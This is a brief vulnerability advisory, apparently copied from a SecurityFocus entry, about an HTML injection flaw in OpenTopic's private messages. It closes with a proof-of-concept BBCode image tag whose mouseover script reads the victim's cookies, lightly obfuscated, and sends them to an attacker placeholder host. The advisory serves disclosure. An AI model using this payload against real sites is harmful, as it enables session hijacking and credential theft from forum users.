10 lines
No EOL
600 B
Text
10 lines
No EOL
600 B
Text
source: https://www.securityfocus.com/bid/6523/info
|
|
|
|
A HTML injection vulnerability has been reported for OpenTopic. The vulnerability exists because OpenTopic does not sufficiently sanitize HTML code from private message posts.
|
|
|
|
When a victim user views any private messages, any malicious HTML code will be executed in the web browser in the security context of the site.
|
|
|
|
Exploitation may allow for theft of cookie-based authentication credentials or other attacks.
|
|
|
|
[IMG]http://[website]/img.gif"width="750"height="750"onmouseover="
|
|
a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG] |